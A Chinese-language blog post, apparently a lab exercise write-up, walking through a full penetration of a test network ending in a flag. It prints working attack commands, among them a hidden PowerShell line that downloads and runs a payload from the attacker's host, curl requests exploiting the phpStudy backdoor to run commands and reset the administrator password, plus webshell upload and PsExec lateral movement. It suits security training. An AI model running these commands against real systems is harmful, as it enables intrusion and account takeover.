<!DOCTYPE html>
<html lang="en">

  <head>
  <meta charset="utf-8">
  <meta name="viewport" content="width=device-width, initial-scale=1" />
  <meta name="keywords" content="hacktrick,hacktrick,Dmagic" />
  <meta name="author" content="hacktrick" />
  <meta name="description" content="hacktrick" />
  
  
  <title>
    
      实战项目四 完整的渗透测试实例 
      
      
      |
    
     hacktrick
  </title>

  
    <link rel="apple-touch-icon" href="/img.jpg">
    <link rel="icon" href="/img.jpg">
  

  <!-- Raleway-Font -->
  <link href="https://fonts.googleapis.com/css?family=Raleway&display=swap" rel="stylesheet">

  <!-- hexo site css -->
  
<link rel="stylesheet" href="/css/base.css">
<link rel="stylesheet" href="/iconfont/iconfont.css">
<link rel="stylesheet" href="/css/github-markdown.css">
<link rel="stylesheet" href="/css/highlight.css">


  <!-- jquery3.3.1 -->
  <script src="https://cdn.bootcss.com/jquery/3.3.1/jquery.min.js"></script>

  <!-- fancybox -->
  <link href="https://cdn.bootcss.com/fancybox/3.5.2/jquery.fancybox.min.css" rel="stylesheet">
  <script async src="https://cdn.bootcss.com/fancybox/3.5.2/jquery.fancybox.min.js"></script>
  
<script src="/js/fancybox.js"></script>


  

<meta name="generator" content="Hexo 5.4.0"></head>


  <body>
    <div id="app">
      <div class="header">
  <div class="avatar">
    <a href="/">
      <!-- 头像取消懒加载，添加no-lazy -->
      
        <img src="/img.jpg" alt="">
      
    </a>
    <div class="nickname"><a href="/">Dmagic</a></div>
  </div>
  <div class="navbar">
    <ul>
      
        <li class="nav-item" data-path="/">
          <a href="/">Posts</a>
        </li>
      
        <li class="nav-item" data-path="/archives/">
          <a href="/archives/">Archives</a>
        </li>
      
        <li class="nav-item" data-path="/about/">
          <a href="/about/">About</a>
        </li>
      
    </ul>
  </div>
</div>


<script src="/js/activeNav.js"></script>



      <div class="flex-container">
        <!-- 文章详情页，展示文章具体内容，url形式：https://yoursite/文章标题/ -->
<!-- 同时为「标签tag」，「朋友friend」，「分类categories」，「关于about」页面的承载页面，具体展示取决于page.type -->

<!-- LaTex Display -->
<script src="https://polyfill.io/v3/polyfill.min.js?features=es6"></script>
<script type="text/javascript" id="MathJax-script" async
  src="https://cdn.jsdelivr.net/npm/mathjax@3/es5/tex-chtml.js">
</script>
<script>
MathJax = {
  tex: {
    inlineMath: [['$', '$'], ['\\(', '\\)']]
  }
};
</script>



  

  

  

  
  <!-- 文章内容页 url形式：https://yoursite/文章标题/ -->
  <div class="container post-details" id="post-details">
    <div class="post-content">
      <div class="post-title">实战项目四 完整的渗透测试实例</div>
      <div class="post-attach">
        <span class="post-pubtime">
          <i class="iconfont icon-updatetime" title="Update time"></i>
          2021-08-08 12:00:00
        </span>
        
      </div>
      <div class="markdown-body">
        <h1 id="实战项目四-完整的渗透测试实例"><a href="#实战项目四-完整的渗透测试实例" class="headerlink" title="实战项目四 完整的渗透测试实例"></a>实战项目四 完整的渗透测试实例</h1><h2 id="环境搭建"><a href="#环境搭建" class="headerlink" title="环境搭建"></a>环境搭建</h2><p>网络架构</p>
<ul>
<li>Kali：172.16.3.226</li>
<li>护卫神：172.16.2.133 10.10.10.135</li>
<li>MSSQL：10.10.10.136 10.10.1.128</li>
<li>目标机器：10.10.1.129</li>
</ul>
<p>目标：拿下10.10.1.1.129</p>
<p>绑定host</p>
<ul>
<li>172.16.2.133 <a target="_blank" rel="noopener" href="http://www.cc123.com/">www.cc123.com</a></li>
</ul>
<h2 id="端口扫描"><a href="#端口扫描" class="headerlink" title="端口扫描"></a>端口扫描</h2><p>使用threader3000快速探测开放端口</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">threader3000</span><br></pre></td></tr></table></figure>

<p><img src="https://gitee.com/magisec/images/raw/master/image-20210806201301880.png" alt="image-20210806201301880"></p>
<p>Nmap扫描</p>
<p><img src="https://gitee.com/magisec/images/raw/master/image-20210806201657351.png" alt="image-20210806201657351"></p>
<p>系统：windows</p>
<p>端口：</p>
<ul>
<li>21 ftp</li>
<li>53 dns</li>
<li>80 http</li>
<li>999 http</li>
<li>3389 rdp</li>
<li>6588 http</li>
</ul>
<h2 id="枚举虚拟主机域名"><a href="#枚举虚拟主机域名" class="headerlink" title="枚举虚拟主机域名"></a>枚举虚拟主机域名</h2><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">wfuzz -H &quot;host:FUZZ.cc123.com&quot; -w &#x2F;usr&#x2F;share&#x2F;amass&#x2F;wordlists&#x2F;subdomains-top1mil-5000.txt --hh 689 http:&#x2F;&#x2F;172.16.2.133&#x2F;</span><br></pre></td></tr></table></figure>

<p><img src="https://gitee.com/magisec/images/raw/master/image-20210806202731805.png" alt="image-20210806202731805"></p>
<p>发现子域名</p>
<ul>
<li>new</li>
<li>www</li>
<li>ww2</li>
</ul>
<p>绑定host</p>
<p><img src="https://gitee.com/magisec/images/raw/master/image-20210806203332262.png" alt="image-20210806203332262"></p>
<h2 id="织梦SQL注入"><a href="#织梦SQL注入" class="headerlink" title="织梦SQL注入"></a>织梦SQL注入</h2><p><img src="https://gitee.com/magisec/images/raw/master/image-20210806203834085.png" alt="image-20210806203834085"></p>
<p>使用python脚本发现跑不出来，由于时间紧迫，采用超级sql注入工具。</p>
<p><img src="https://gitee.com/magisec/images/raw/master/image-20210807014533296.png" alt="image-20210807014533296"></p>
<p>跑出来了，拿到somd5解密。</p>
<p><img src="https://gitee.com/magisec/images/raw/master/image-20210807020414809.png" alt="image-20210807020414809"></p>
<p>解密成功 获得密码 admin7788</p>
<p><img src="https://gitee.com/magisec/images/raw/master/image-20210807020818844.png" alt="image-20210807020818844"></p>
<h2 id="织梦后台getshell"><a href="#织梦后台getshell" class="headerlink" title="织梦后台getshell"></a>织梦后台getshell</h2><p>使用密码登录后台，来到文件管理，上传aspx的马。因为前期踩点，发现同服务器下的6588可以解析asp，所以这里上传aspx。一般来说aspx的</p>
<p>权限会比php大，而且可以躲避disablefunc。所以直接使用aspx更方便。这里我们上传冰蝎的aspx马子，并进行连接。</p>
<p><img src="https://gitee.com/magisec/images/raw/master/image-20210807022708022.png" alt="image-20210807022708022"></p>
<h2 id="CS使用Powershell上线"><a href="#CS使用Powershell上线" class="headerlink" title="CS使用Powershell上线"></a>CS使用Powershell上线</h2><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">powershell.exe -nop -w hidden -c &quot;IEX ((new-object net.webclient).downloadstring(&#39;http:&#x2F;&#x2F;172.16.3.226:80&#x2F;a&#39;))&quot;</span><br></pre></td></tr></table></figure>

<p><img src="https://gitee.com/magisec/images/raw/master/image-20210807203733100.png" alt="image-20210807203733100"></p>
<h2 id="使用CS插件烂土豆提权"><a href="#使用CS插件烂土豆提权" class="headerlink" title="使用CS插件烂土豆提权"></a>使用CS插件烂土豆提权</h2><p><img src="https://gitee.com/magisec/images/raw/master/image-20210807203905884.png" alt="image-20210807203905884"></p>
<h2 id="CS迁移进程"><a href="#CS迁移进程" class="headerlink" title="CS迁移进程"></a>CS迁移进程</h2><p><img src="https://gitee.com/magisec/images/raw/master/image-20210807203940452.png" alt="image-20210807203940452"></p>
<h2 id="Ladon探测内网存活"><a href="#Ladon探测内网存活" class="headerlink" title="Ladon探测内网存活"></a>Ladon探测内网存活</h2><p><img src="https://gitee.com/magisec/images/raw/master/image-20210807204009505.png" alt="image-20210807204009505"></p>
<p>整理一下结果</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">ICMP: 10.10.10.129	00-0C-29-04-89-C5	WIN-KALKEMT3JMA	VMware</span><br><span class="line">ICMP: 10.10.10.128	00-0C-29-A1-E6-48	WIN-JJU7KU45PN7	VMware</span><br></pre></td></tr></table></figure>

<h2 id="IOX搭建反向socks代理隧道"><a href="#IOX搭建反向socks代理隧道" class="headerlink" title="IOX搭建反向socks代理隧道"></a>IOX搭建反向socks代理隧道</h2><p>vps执行</p>
<p><img src="https://gitee.com/magisec/images/raw/master/image-20210807213343314.png" alt="image-20210807213343314"></p>
<p>肉鸡执行</p>
<p><img src="https://gitee.com/magisec/images/raw/master/image-20210807213353234.png" alt="image-20210807213353234"></p>
<h2 id="Mssql命令执行"><a href="#Mssql命令执行" class="headerlink" title="Mssql命令执行"></a>Mssql命令执行</h2><p>读取web.config获取配置文件（之前用MSF的时候）</p>
<p><img src="https://gitee.com/magisec/images/raw/master/image-20210807032051459.png" alt="image-20210807032051459"></p>
<ul>
<li>WIN-JJU7KU45PN7 就是 10.10.10.128</li>
</ul>
<p>配置如下</p>
<p><img src="https://gitee.com/magisec/images/raw/master/image-20210807034644411.png" alt="image-20210807034644411"></p>
<p>使用mssql_exec执行命令</p>
<p><img src="https://gitee.com/magisec/images/raw/master/image-20210807033511501.png" alt="image-20210807033511501"></p>
<p>使用mssql_exec修改administrator密码，这里虽然报错，但是命令还是可以执行的，只是编码错误。</p>
<p><img src="https://gitee.com/magisec/images/raw/master/image-20210807034505312.png" alt="image-20210807034505312"></p>
<h2 id="Psexec横向移动"><a href="#Psexec横向移动" class="headerlink" title="Psexec横向移动"></a>Psexec横向移动</h2><p>使用psexec横向移动</p>
<p><img src="https://gitee.com/magisec/images/raw/master/image-20210807220722085.png" alt="image-20210807220722085"></p>
<p>成功获取权限</p>
<h2 id="Ladon探测内网存活-1"><a href="#Ladon探测内网存活-1" class="headerlink" title="Ladon探测内网存活"></a>Ladon探测内网存活</h2><p>使用ipconfig /all查看网段</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">shell ipconfig &#x2F;all</span><br></pre></td></tr></table></figure>

<p><img src="https://gitee.com/magisec/images/raw/master/image-20210807221257134.png" alt="image-20210807221257134"></p>
<p>使用Ladon扫描</p>
<p><img src="https://gitee.com/magisec/images/raw/master/image-20210807221340264.png" alt="image-20210807221340264"></p>
<p>发现目标，这里其实可以用psexec直接横向过去，这里我们使用其他的方法。</p>
<h2 id="Ladon扫描端口"><a href="#Ladon扫描端口" class="headerlink" title="Ladon扫描端口"></a>Ladon扫描端口</h2><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">Ladon 10.10.1.128 Portscan 1-65535</span><br></pre></td></tr></table></figure>

<p><img src="https://gitee.com/magisec/images/raw/master/image-20210807221721660.png" alt="image-20210807221721660"></p>
<h2 id="phpstudy利用"><a href="#phpstudy利用" class="headerlink" title="phpstudy利用"></a>phpstudy利用</h2><p>cs开启socks4代理</p>
<p><img src="https://gitee.com/magisec/images/raw/master/image-20210807224000022.png" alt="image-20210807224000022"></p>
<p>proxychains配置代理</p>
<p><img src="https://gitee.com/magisec/images/raw/master/image-20210807224029821.png" alt="image-20210807224029821"></p>
<p>使用proxychains配合curl利用phpstudy</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">proxychains curl -H &quot;Accept-Charset: $(echo &#39;system(&quot;ipconfig&quot;);&#39; | base64)&quot; -H &#39;Accept-Encoding: gzip,deflate&#39; 10.10.1.128</span><br></pre></td></tr></table></figure>

<p><img src="https://gitee.com/magisec/images/raw/master/image-20210807224141089.png" alt="image-20210807224141089"></p>
<p>直接修改密码</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">proxychains curl -H &quot;Accept-Charset: $(echo &#39;system(&quot;net user administrator admin!123&quot;);&#39; | base64)&quot; -H &#39;Accept-Encoding: gzip,deflate&#39; 10.10.1.128</span><br></pre></td></tr></table></figure>

<p><img src="https://gitee.com/magisec/images/raw/master/image-20210807224450310.png" alt="image-20210807224450310"></p>
<h2 id="PSexec横向移动拿下目标"><a href="#PSexec横向移动拿下目标" class="headerlink" title="PSexec横向移动拿下目标"></a>PSexec横向移动拿下目标</h2><p><img src="https://gitee.com/magisec/images/raw/master/image-20210807224409724.png" alt="image-20210807224409724"></p>
<p>成功拿下</p>
<p><img src="https://gitee.com/magisec/images/raw/master/image-20210807224555943.png" alt="image-20210807224555943"></p>
<h2 id="获取flag"><a href="#获取flag" class="headerlink" title="获取flag"></a>获取flag</h2><p><img src="https://gitee.com/magisec/images/raw/master/image-20210807224757191.png" alt="image-20210807224757191"></p>

      </div>
      
        <div class="prev-or-next">
          <div class="post-foot-next">
            
              <a href="/2021/06/12/FRP%E6%94%B9%E9%80%A0/" target="_self">
                <i class="iconfont icon-chevronleft"></i>
                <span>Prev</span>
              </a>
            
          </div>
          <div class="post-attach">
            <span class="post-pubtime">
              <i class="iconfont icon-updatetime" title="Update time"></i>
              2021-08-08 12:00:00
            </span>
            
          </div>
          <div class="post-foot-prev">
            
              <a href="/2021/08/08/%E5%AE%9E%E6%88%98%E9%A1%B9%E7%9B%AE%E4%BA%94%20linux%E5%86%85%E7%BD%91%E5%AE%8C%E6%95%B4%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95/" target="_self">
                <span>Next</span>
                <i class="iconfont icon-chevronright"></i>
              </a>
            
          </div>
        </div>
      
    </div>
    
  <div class="post-catalog" id="catalog">
    <div class="title">Contents</div>
    <div class="catalog-content">
      <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#%E5%AE%9E%E6%88%98%E9%A1%B9%E7%9B%AE%E5%9B%9B-%E5%AE%8C%E6%95%B4%E7%9A%84%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95%E5%AE%9E%E4%BE%8B"><span class="toc-text">实战项目四 完整的渗透测试实例</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E7%8E%AF%E5%A2%83%E6%90%AD%E5%BB%BA"><span class="toc-text">环境搭建</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E7%AB%AF%E5%8F%A3%E6%89%AB%E6%8F%8F"><span class="toc-text">端口扫描</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%9E%9A%E4%B8%BE%E8%99%9A%E6%8B%9F%E4%B8%BB%E6%9C%BA%E5%9F%9F%E5%90%8D"><span class="toc-text">枚举虚拟主机域名</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E7%BB%87%E6%A2%A6SQL%E6%B3%A8%E5%85%A5"><span class="toc-text">织梦SQL注入</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E7%BB%87%E6%A2%A6%E5%90%8E%E5%8F%B0getshell"><span class="toc-text">织梦后台getshell</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#CS%E4%BD%BF%E7%94%A8Powershell%E4%B8%8A%E7%BA%BF"><span class="toc-text">CS使用Powershell上线</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E4%BD%BF%E7%94%A8CS%E6%8F%92%E4%BB%B6%E7%83%82%E5%9C%9F%E8%B1%86%E6%8F%90%E6%9D%83"><span class="toc-text">使用CS插件烂土豆提权</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#CS%E8%BF%81%E7%A7%BB%E8%BF%9B%E7%A8%8B"><span class="toc-text">CS迁移进程</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Ladon%E6%8E%A2%E6%B5%8B%E5%86%85%E7%BD%91%E5%AD%98%E6%B4%BB"><span class="toc-text">Ladon探测内网存活</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#IOX%E6%90%AD%E5%BB%BA%E5%8F%8D%E5%90%91socks%E4%BB%A3%E7%90%86%E9%9A%A7%E9%81%93"><span class="toc-text">IOX搭建反向socks代理隧道</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Mssql%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C"><span class="toc-text">Mssql命令执行</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Psexec%E6%A8%AA%E5%90%91%E7%A7%BB%E5%8A%A8"><span class="toc-text">Psexec横向移动</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Ladon%E6%8E%A2%E6%B5%8B%E5%86%85%E7%BD%91%E5%AD%98%E6%B4%BB-1"><span class="toc-text">Ladon探测内网存活</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Ladon%E6%89%AB%E6%8F%8F%E7%AB%AF%E5%8F%A3"><span class="toc-text">Ladon扫描端口</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#phpstudy%E5%88%A9%E7%94%A8"><span class="toc-text">phpstudy利用</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#PSexec%E6%A8%AA%E5%90%91%E7%A7%BB%E5%8A%A8%E6%8B%BF%E4%B8%8B%E7%9B%AE%E6%A0%87"><span class="toc-text">PSexec横向移动拿下目标</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E8%8E%B7%E5%8F%96flag"><span class="toc-text">获取flag</span></a></li></ol></li></ol>
    </div>
  </div>

  
<script src="/js/catalog.js"></script>




    
  </div>


        <div class="footer">
  <div class="social">
    <ul>
      
        <li>
          <a title="github" target="_blank" rel="noopener" href="https://github.com/magisec/">
            <i class="iconfont icon-github"></i>
          </a>
        </li>
      
    </ul>
  </div>
  
    <div class="footer-more">
      
        <a target="_blank" rel="noopener" href="https://github.com/magisec/magisec.github.io">Theme by Hacktrick</a>
        
    </div>
  
</div>

      </div>

      <div class="back-to-top hidden">
  <a href="javascript: void(0)">
    <i class="iconfont icon-chevronup"></i>
  </a>
</div>


<script src="/js/backtotop.js"></script>



      
  <div class="search-icon" id="search-icon">
    <a href="javascript: void(0)">
      <i class="iconfont icon-search"></i>
    </a>
  </div>

  <div class="search-overlay hidden">
    <div class="search-content" tabindex="0">
      <div class="search-title">
        <span class="search-icon-input">
          <a href="javascript: void(0)">
            <i class="iconfont icon-search"></i>
          </a>
        </span>
        
          <input type="text" class="search-input" id="search-input" placeholder="Search...">
        
        <span class="search-close-icon" id="search-close-icon">
          <a href="javascript: void(0)">
            <i class="iconfont icon-close"></i>
          </a>
        </span>
      </div>
      <div class="search-result" id="search-result"></div>
    </div>
  </div>

  <script type="text/javascript">
    var inputArea = document.querySelector("#search-input")
    var searchOverlayArea = document.querySelector(".search-overlay")

    inputArea.onclick = function() {
      getSearchFile()
      this.onclick = null
    }

    inputArea.onkeydown = function() {
      if(event.keyCode == 13)
        return false
    }

    function openOrHideSearchContent() {
      let isHidden = searchOverlayArea.classList.contains('hidden')
      if (isHidden) {
        searchOverlayArea.classList.remove('hidden')
        document.body.classList.add('hidden')
        // inputArea.focus()
      } else {
        searchOverlayArea.classList.add('hidden')
        document.body.classList.remove('hidden')
      }
    }

    function blurSearchContent(e) {
      if (e.target === searchOverlayArea) {
        openOrHideSearchContent()
      }
    }

    document.querySelector("#search-icon").addEventListener("click", openOrHideSearchContent, false)
    document.querySelector("#search-close-icon").addEventListener("click", openOrHideSearchContent, false)
    searchOverlayArea.addEventListener("click", blurSearchContent, false)

    var searchFunc = function (path, search_id, content_id) {
      'use strict';
      var $input = document.getElementById(search_id);
      var $resultContent = document.getElementById(content_id);
      $resultContent.innerHTML = "<ul><span class='local-search-empty'>First search, index file loading, please wait...<span></ul>";
      $.ajax({
        // 0x01. load xml file
        url: path,
        dataType: "xml",
        success: function (xmlResponse) {
          // 0x02. parse xml file
          var datas = $("entry", xmlResponse).map(function () {
            return {
              title: $("title", this).text(),
              content: $("content", this).text(),
              url: $("url", this).text()
            };
          }).get();
          $resultContent.innerHTML = "";

          $input.addEventListener('input', function () {
            // 0x03. parse query to keywords list
            var str = '<ul class=\"search-result-list\">';
            var keywords = this.value.trim().toLowerCase().split(/[\s\-]+/);
            $resultContent.innerHTML = "";
            if (this.value.trim().length <= 0) {
              return;
            }
            // 0x04. perform local searching
            datas.forEach(function (data) {
              var isMatch = true;
              var content_index = [];
              if (!data.title || data.title.trim() === '') {
                data.title = "Untitled";
              }
              var orig_data_title = data.title.trim();
              var data_title = orig_data_title.toLowerCase();
              var orig_data_content = data.content.trim().replace(/<[^>]+>/g, "");
              var data_content = orig_data_content.toLowerCase();
              var data_url = data.url;
              var index_title = -1;
              var index_content = -1;
              var first_occur = -1;
              // only match artiles with not empty contents
              if (data_content !== '') {
                keywords.forEach(function (keyword, i) {
                  index_title = data_title.indexOf(keyword);
                  index_content = data_content.indexOf(keyword);

                  if (index_title < 0 && index_content < 0) {
                    isMatch = false;
                  } else {
                    if (index_content < 0) {
                      index_content = 0;
                    }
                    if (i == 0) {
                      first_occur = index_content;
                    }
                    // content_index.push({index_content:index_content, keyword_len:keyword_len});
                  }
                });
              } else {
                isMatch = false;
              }
              // 0x05. show search results
              if (isMatch) {
                str += "<li><a href='" + data_url + "' class='search-result-title'>" + orig_data_title + "</a>";
                var content = orig_data_content;
                if (first_occur >= 0) {
                  // cut out 100 characters
                  var start = first_occur - 20;
                  var end = first_occur + 80;

                  if (start < 0) {
                    start = 0;
                  }

                  if (start == 0) {
                    end = 100;
                  }

                  if (end > content.length) {
                    end = content.length;
                  }

                  var match_content = content.substr(start, end);

                  // highlight all keywords
                  keywords.forEach(function (keyword) {
                    var regS = new RegExp(keyword, "gi");
                    match_content = match_content.replace(regS, "<span class=\"search-keyword\">" + keyword + "</span>");
                  });

                  str += "<p class=\"search-result-abstract\">" + match_content + "...</p>"
                }
                str += "</li>";
              }
            });
            str += "</ul>";
            if (str.indexOf('<li>') === -1) {
              return $resultContent.innerHTML = "<ul><span class='local-search-empty'>No result<span></ul>";
            }
            $resultContent.innerHTML = str;
          });
        },
        error: function(xhr, status, error) {
          $resultContent.innerHTML = ""
          if (xhr.status === 404) {
            $resultContent.innerHTML = "<ul><span class='local-search-empty'>The search.xml file was not found, please refer to：<a href='https://github.com/zchengsite/hexo-theme-oranges#configuration' target='_black'>configuration</a><span></ul>";
          } else {
            $resultContent.innerHTML = "<ul><span class='local-search-empty'>The request failed, Try to refresh the page or try again later.<span></ul>";
          }
        }
      });
      $(document).on('click', '#search-close-icon', function() {
        $('#search-input').val('');
        $('#search-result').html('');
      });
    }

    var getSearchFile = function() {
        var path = "/search.xml";
        searchFunc(path, 'search-input', 'search-result');
    }
  </script>




    </div>
  </body>
</html>
